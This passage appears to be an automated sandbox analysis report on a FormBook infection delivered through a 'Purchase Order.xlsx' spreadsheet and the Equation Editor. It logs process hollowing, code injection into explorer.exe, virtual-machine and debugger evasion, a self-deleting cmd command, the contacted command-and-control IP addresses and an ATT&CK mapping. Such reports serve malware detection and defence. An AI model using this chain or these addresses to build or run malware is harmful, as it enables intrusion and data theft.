          Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
          Source: Purchase Order.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Purchase Order.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeUnpacked PE file: 6.2.dtz25z5e9sr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress,
          Source: vbc.exe.2.drStatic PE information: real checksum: 0x0 should be: 0xcb8fe
          Source: scancopy87867678[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0xcb8fe
          Source: dtz25z5e9sr.exe.5.drStatic PE information: real checksum: 0xdf890 should be: 0xe835e
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418855 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004070C8 push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0040BACC push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004092E8 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004162B3 push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B3C5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B47C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B412 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B41B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CF7F push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEDFA1 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004070C8 push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004092E8 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004162B3 push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B3C5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B47C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B412 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B41B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418855 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0040BACC push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CF7F push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009C04B push ss; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000870C8 push ecx; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000962B3 push esp; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000892E8 push cs; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B41B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B412 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Purchase Order.xlsxStream path 'EncryptedPackage' entropy: 7.99991439785 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C60501 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2992Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 752Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2183832262.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2180947602.00000000002CD000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000008.00000002.2380274891.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C60501 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C445D5 BlockInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C22AF8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BFA354 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 103.209.233.78 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.47.75 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.228.109.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.195 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.169.249 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.92.209.208 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: B60000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory written: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base: 7EFDE008
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: vbc.exe, 00000004.00000002.2182138412.0000000002826000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: acqyswhf.exe, explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C10030 GetLocalTime,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C10722 GetUserNameW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: acqyswhf.exeBinary or memory string: WIN_81
          Source: acqyswhf.exeBinary or memory string: WIN_XP
          Source: acqyswhf.exeBinary or memory string: WIN_XPe
          Source: acqyswhf.exeBinary or memory string: WIN_VISTA
          Source: acqyswhf.exeBinary or memory string: WIN_7
          Source: acqyswhf.exeBinary or memory string: WIN_8
          Source: dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture11System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsApplication Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information31Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Process Injection612Software Packing11NTDSSystem Information Discovery16Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsSecurity Software Discovery241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
